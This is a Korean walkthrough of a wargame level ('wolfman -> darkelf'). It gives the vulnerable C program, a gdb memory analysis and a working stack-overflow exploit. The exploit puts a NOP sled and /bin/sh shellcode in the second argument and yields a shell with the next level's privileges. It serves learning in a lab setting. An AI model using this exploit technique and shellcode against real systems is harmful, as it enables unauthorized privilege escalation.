[6] wolfman -> darkelf ( argv[2] 활용 )

wolfman / love eyuna

[wolfman@localhost wolfman]$ /bin/bash2

[wolfman@localhost wolfman]$ SHELL=/bin/bash2

[ darkelf.c ]

 
#include <stdio.h>
#include <stdlib.h>
 
extern char **environ;
 
main(int argc, char *argv[])
{
        char buffer[40];
        int i;
 
        if(argc < 2){
                printf("argv error\n");
                exit(0);
        }
 
        // egghunter
        for(i=0; environ[i]; i++)
                memset(environ[i], 0, strlen(environ[i]));
 
        if(argv[1][47] != '\xbf')
        {
                printf("stack is still your friend.\n");
                exit(0);
        }
 
        // check the length of argument
        if(strlen(argv[1]) > 48){
                printf("argument is too long!\n");
                exit(0);
        }
 
        strcpy(buffer, argv[1]);
        printf("%s\n", buffer);
 
        // buffer hunter
        memset(buffer, 0, 40);
}
 

egg hunter + buffer hunter + check length of argv[1]

[ Stack 구조 ]

i

buffer         40byte     ----

saved ebp    4byte     첫 인자는 48byte까지만 입력가능하다

saved eip     RET        ----

argc

argv[0]

argv[1]

argv[2]

< 풀이 과정 >

이전 문제와 동일하게 두 번째 인자에 쉘 코드를 올려서 문제를 풀겠다

[wolfman@localhost wolfman]$ gdb -q darkelf.cp

(gdb) set disassembly-flavor intel

(gdb) disas main

Dump of assembler code for function main:

0x8048500 <main>:       push   %ebp

0x8048501 <main+1>:     mov    %ebp,%esp

0x8048503 <main+3>:     sub    %esp,44

....

0x804860e <main+270>:   call   0x8048430 <memset>

0x8048613 <main+275>:   add    %esp,12

0x8048616 <main+278>:   leave

(gdb) b *0x8048616

Breakpoint 1 at 0x8048616

(gdb) run $(python -c 'print "A" * 44 + "\xbf\xbf\xbf\xbf"') $(python -c 'print "B"*1024')

Starting program: /home/wolfman/darkelf.cp $(python -c 'print "A" * 44 + "\xbf\xbf\xbf\xbf"') $(python -c 'print "B"*1024')

AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA▒▒▒▒

Breakpoint 1, 0x8048616 in main ()

(gdb) x/24x $ebp-40

0xbffff6b0:     0x00000000      0x00000000      0x00000000      0x00000000

0xbffff6c0:     0x00000000      0x00000000      0x00000000      0x00000000

0xbffff6d0:     0x00000000      0x00000000      0x41414141      0xbfbfbfbf <-- saved eip

0xbffff6e0:     0x00000000      0xbffff724      0xbffff734      0x40013868

0xbffff6f0:     0x00000003      0x08048450      0x00000000      0x08048471

0xbffff700:     0x08048500      0x00000003      0xbffff724      0x08048390

(gdb)

0xbffff710:     0x0804864c      0x4000ae60      0xbffff71c      0x40013e90

  [ argc ]               [ argv[0] ]             [ argv[1] ]            [ argv[2] ]

0xbffff720:     0x00000003      0xbffff820      0xbffff839      0xbffff86a <-- 두 번째 인자 주소

0xbffff730:     0x00000000      0xbffffc6b      0xbffffc7d      0xbffffc96

0xbffff740:     0xbffffcb5      0xbffffcd7      0xbffffce4      0xbffffea7

0xbffff750:     0xbffffec6      0xbffffee3      0xbffffef8      0xbfffff17

(gdb) x/s 0xbffff820

0xbffff820:      "/home/wolfman/darkelf.cp"

(gdb) x/s 0xbffff839

0xbffff839:      'A' <repeats 44 times>, "▒▒▒▒"

(gdb) x/s 0xbffff86a

0xbffff86a:      'B' <repeats 200 times>...

[ payload ]

[wolfman@localhost wolfman]$ ./darkelf $(python -c 'print "A" * 44 + "\x2c\xf7\xff\xbf"') $(python -c 'print "\x90" * 1000 + "\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x99\xb0\x0b\xcd\x80"')

AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA,▒▒▒

Segmentation fault

=> 보정작업

[wolfman@localhost wolfman]$ ./darkelf $(python -c 'print "A" * 44 + "\x2c\xf9\xff\xbf"') $(python -c 'print "\x90" * 1000 + "\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x99\xb0\x0b\xcd\x80"')

AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA,▒▒▒

bash$ id

uid=505(wolfman) gid=505(wolfman) euid=506(darkelf) egid=506(darkelf) groups=505(wolfman)

bash$ my-pass

euid = 506

kernel crashed

bash$